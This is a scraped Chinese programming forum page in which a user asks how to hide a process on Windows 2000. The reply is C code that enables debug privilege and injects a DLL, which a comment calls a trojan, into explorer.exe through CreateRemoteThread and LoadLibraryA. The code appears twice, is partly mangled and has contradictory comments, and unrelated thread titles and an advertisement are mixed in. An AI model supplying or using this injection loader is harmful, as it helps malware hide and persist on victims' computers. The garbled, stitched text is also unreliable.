关于进程在win2k下隐藏的问题 我拜读过很多大大写的关于进程隐藏的帖子,但是还是不知道如何在win2k下隐藏进程。是否能给一段最简单的对话框程序完成进程的隐藏呢?谢谢 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 #include "tlhelp32.h"HANDLE hRemoteThread,hRemoteProcess;DWORD dwRemoteProcessid;LPVOID pszLibFileRemote=NULL;DWORD ProcesstoPid(char *pid) //查找指定进程的PID(Process ID){HANDLE hProcessSnap=NULL;char buffer[MAX_PATH];PROCESSENTRY32 pe32={0};int i;hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //打开进程快照if(hProcessSnap==(HANDLE)-1){printf("CreateToolhelp32Snapshot() Error: %d",GetLastError());return 0;}pe32.dwSize=sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap,&pe32)) //开始枚举进程{do{strcpy(buffer,pe32.szExeFile);for(i=strlen(buffer);i>0;i--) //截取进程名if(buffer[i]=='\\')break;if(!stricmp(pid,&buffer[i])) //判断是否和提供的进程名相等,是,返回进程的IDreturn pe32.th32ProcessID;}while(Process32Next(hProcessSnap,&pe32)); //继续枚举进程}else{printf("Process32First() Error: %d",GetLastError());return 0;}CloseHandle(hProcessSnap); //关闭系统进程快照的句柄return 0;}BOOL SetPrivilege() //本函数用于提升权限,提升到SE_DEBUG_NAME{ TOKEN_PRIVILEGES tkp; HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) //打开当前进程失败 return FALSE; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid); //查看当前权限tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); //调整权限,如上设置return TRUE; } int main(){int cb;PTHREAD_START_ROUTINE pfnstartaddr;DWORD Threadid=0;char pszlibfilename[MAX_PATH];dwRemoteProcessid=ProcesstoPid("explorer.exe"); //得到记事本的PID,当然也可以得到EXPLORER.EXE的PID,不过除非结束它的进程,不然一直驻留在内存中!GetCurrentDirectory(MAX_PATH,pszlibfilename); //得到当前的目录路径if(pszlibfilename[strlen(pszlibfilename)-1]!='\\') //判断是否为根目录strcat(pszlibfilename,"\\apihookpre.dll");elsestrcat(pszlibfilename,"apihookpre.dll"); //连接要插入的动态连接库的文件名(这里是Trojan.dll)GetCommandLine()if(!SetPrivilege()){printf("Error in SetPrivilege(): %d ",GetLastError());return 1;}hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); //打开notepad.exe的进程得到进程句柄,注意第一个参数(打开句柄设置的权限)if(!hRemoteProcess){printf("Remote Process not Exist or Access Denied ");return -1;}cb=(1+strlen(pszlibfilename))*sizeof(char); //计算dll文件名长度pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); //申请存放文件名的空间if(!pszLibFileRemote) {printf("VirtualAllocEx() Error: %d",GetLastError());return -1;}if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) //把dll文件名写入申请的空间{printf("WriteProcessMemory() Error: %d",GetLastError());return -1;}pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA"); //获取动态链接库函数地址if(!pfnstartaddr){printf("GetProcAddress() Error: %d",GetLastError());return -1;}hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,&Threadid); //创建远程线程,以DLL的文件名为远线程的参数printf("inject successfully");if(!hRemoteThread){printf("CreateRemoteThread() Error: %d ",GetLastError());return -1;}WaitForSingleObject(hRemoteThread,INFINITE); //等待,其实可以设置一个超时值,这里是无限等待if(pszLibFileRemote!=NULL) //以下是清理过程!{VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);}if(hRemoteThread !=NULL){CloseHandle(hRemoteThread);}if(hRemoteProcess!=NULL){CloseHandle(hRemoteProcess);}printf("Done!");return 0;} 请教一个关于类中函数值的传递问题 大家说我想的对不对? 如何在SDI的用户工作区画一个闪烁的矩形区域 怎样在编辑框中显示十进制小数? MFC做编译器有关的小问题,请高手指教? 请问TCHAR ,CString ,LPSTR有什么区别,我想声明一个字符型的二维数组,该怎么做呢? 如何在VC中写Dll文件? VC++6.0下的报表一般都怎样生成,使用什么工具,还是什么类库?急,给个思路。 打印 1/7 小数点后500位如何实现 关于基类触发派生类重绘的问题 高手请进,多线程winsock程序的问题(高分-在线等) 用过EPSON OLE POS或其他OPOS的近来一下啊:怎么定制啊?
DWORD dwRemoteProcessid;
LPVOID pszLibFileRemote=NULL;DWORD ProcesstoPid(char *pid) //查找指定进程的PID(Process ID)
{
HANDLE hProcessSnap=NULL;
char buffer[MAX_PATH];
PROCESSENTRY32 pe32={0};
int i;
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //打开进程快照
if(hProcessSnap==(HANDLE)-1)
{
printf("CreateToolhelp32Snapshot() Error: %d",GetLastError());
return 0;
}
pe32.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hProcessSnap,&pe32)) //开始枚举进程
{
do
{
strcpy(buffer,pe32.szExeFile);
for(i=strlen(buffer);i>0;i--) //截取进程名
if(buffer[i]=='\\')
break;
if(!stricmp(pid,&buffer[i])) //判断是否和提供的进程名相等,是,返回进程的ID
return pe32.th32ProcessID;
}
while(Process32Next(hProcessSnap,&pe32)); //继续枚举进程
}
else
{
printf("Process32First() Error: %d",GetLastError());
return 0;
}
CloseHandle(hProcessSnap); //关闭系统进程快照的句柄
return 0;
}BOOL SetPrivilege() //本函数用于提升权限,提升到SE_DEBUG_NAME
{
TOKEN_PRIVILEGES tkp;
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) //打开当前进程失败
return FALSE;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid); //查看当前权限
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); //调整权限,如上设置
return TRUE;
}
int main()
{
int cb;
PTHREAD_START_ROUTINE pfnstartaddr;
DWORD Threadid=0;
char pszlibfilename[MAX_PATH];
dwRemoteProcessid=ProcesstoPid("explorer.exe"); //得到记事本的PID,当然也可以得到EXPLORER.EXE的PID,不过除非结束它的进程,不然一直驻留在内存中!
GetCurrentDirectory(MAX_PATH,pszlibfilename); //得到当前的目录路径
if(pszlibfilename[strlen(pszlibfilename)-1]!='\\') //判断是否为根目录
strcat(pszlibfilename,"\\apihookpre.dll");
else
strcat(pszlibfilename,"apihookpre.dll"); //连接要插入的动态连接库的文件名(这里是Trojan.dll)
GetCommandLine()if(!SetPrivilege())
{
printf("Error in SetPrivilege(): %d ",GetLastError());
return 1;
}hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwRemoteProcessid); //打开notepad.exe的进程得到进程句柄,注意第一个参数(打开句柄设置的权限)if(!hRemoteProcess)
{
printf("Remote Process not Exist or Access Denied ");
return -1;
}cb=(1+strlen(pszlibfilename))*sizeof(char); //计算dll文件名长度pszLibFileRemote=VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); //申请存放文件名的空间if(!pszLibFileRemote)
{
printf("VirtualAllocEx() Error: %d",GetLastError());
return -1;
}
if(!WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszlibfilename,cb,NULL)) //把dll文件名写入申请的空间
{
printf("WriteProcessMemory() Error: %d",GetLastError());
return -1;
}pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"),"LoadLibraryA"); //获取动态链接库函数地址if(!pfnstartaddr)
{
printf("GetProcAddress() Error: %d",GetLastError());
return -1;
}hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnstartaddr,pszLibFileRemote,0,&Threadid); //创建远程线程,以DLL的文件名为远线程的参数
printf("inject successfully");if(!hRemoteThread)
{
printf("CreateRemoteThread() Error: %d ",GetLastError());
return -1;
}
WaitForSingleObject(hRemoteThread,INFINITE); //等待,其实可以设置一个超时值,这里是无限等待
if(pszLibFileRemote!=NULL) //以下是清理过程!
{
VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
}
if(hRemoteThread !=NULL)
{
CloseHandle(hRemoteThread);
}
if(hRemoteProcess!=NULL)
{
CloseHandle(hRemoteProcess);
}
printf("Done!");
return 0;}